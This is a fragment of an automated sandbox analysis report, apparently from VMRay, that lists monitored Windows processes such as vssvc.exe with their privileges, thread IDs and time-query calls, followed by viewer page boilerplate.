Unmonitor End Time: 00:01:15, Reason: Terminated by Timeout
Monitor Duration 00:00:14
Remark No high level activity detected in monitored regions
OS Process Information
»
Information Value
PID 0xae8
Parent PID 0x254 (c:\windows\system32\svchost.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\Network Service
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x AEC
0x AF0
0x AF4
0x AF8
0x AFC
0x B00
0x B04
Process #6: vssvc.exe
3 0
»
Information Value
ID #6
File Name c:\windows\system32\vssvc.exe
Command Line C:\Windows\system32\vssvc.exe
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:11, Reason: RPC Server
Unmonitor End Time: 00:01:15, Reason: Terminated by Timeout
Monitor Duration 00:00:04
OS Process Information
»
Information Value
PID 0xb08
Parent PID 0x1cc (c:\windows\system32\services.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs
0x B20
0x B1C
0x B18
0x B14
0x B10
0x B0C
0x B28
0x B44
Threads
Thread 0xb18
3 0
»
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2019-06-01 18:41:02 (UTC) True 1
Fn
System Get Time type = Ticks, time = 132632 True 1
Fn
System Get Time type = Performance Ctr, time = 19328746087 True 1
Fn
Function Logfile
Download-Icon
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy". 


    

   

   

    Before
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    After
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    

     
      

       
       
       
       
      

     
     
     
    

   

  

  

   

    
    

     Screenshot
    

    

     Expand-Icon
    

    

     Exit-Icon
    

   

   

    

     icon_left
    

    

     icon_left
    

   

   

   

   

    image